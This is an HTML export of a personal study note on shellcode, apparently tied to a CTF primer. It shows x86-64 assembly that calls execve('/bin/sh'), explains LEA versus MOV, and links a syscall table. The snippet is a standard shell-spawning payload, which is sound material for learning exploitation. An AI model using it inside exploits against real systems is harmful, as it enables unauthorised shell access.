<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>shellcode</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>shellcode</h1>

      <div class="ck-content"><pre><code class="language-text-plain">.globl _start
_start:
.intel_syntax noprefix
        mov rax, 59				# syscall number for execve
        lea rdi, [rip+binsh]	# first arg of execve "/bin/sh"
        mov rsi, 0				# second arg, argv, NULL
        mov rdx, 0				# third arg, envp, NULL
        syscall					# trigger syscall
binsh:
        .string "/bin/sh" </code></pre>

        <ul>
          <li><code>LEA</code> means Load Effective Address</li>
          <li><code>MOV</code> means Load Value</li>
        </ul>
        <p>In short, <code>LEA</code> loads a pointer to the item you're addressing
          whereas MOV loads the actual value at that address.</p>
        <p>The purpose of <code>LEA</code> is to allow one to perform a non-trivial
          address calculation and store the result [for later usage]</p><pre><code class="language-text-plain">LEA ax, [BP+SI+5] ; Compute address of value

MOV ax, [BP+SI+5] ; Load value at that address</code></pre>

        <p><a href="https://filippo.io/linux-syscall-table/">https://filippo.io/linux-syscall-table/</a> </p>
        <p><a href="https://blog.skullsecurity.org/2021/bsidessf-ctf-2021-author-writeup-shellcode-primer-runme-runme2-and-runme3">https://blog.skullsecurity.org/2021/bsidessf-ctf-2021-author-writeup-shellcode-primer-runme-runme2-and-runme3</a> </p>
      </div>
    </div>
  </body>

</html>